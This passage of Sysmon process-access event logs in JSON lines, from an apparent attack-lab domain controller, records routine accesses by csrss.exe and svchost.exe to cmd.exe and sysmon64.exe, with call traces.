Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3595,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.295\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-023D-5F25-0000-001075610500}\r\nTargetProcessId: 4844\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.295","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-023D-5F25-0000-001075610500}","TargetProcessId":"4844","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3596,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.295\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.295","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3597,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.295\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.295","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3598,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.295\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.295","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3599,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.295\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.295","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3600,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.295\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.295","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3601,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.295\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.295","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3602,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.295\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.295","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3603,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.295\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 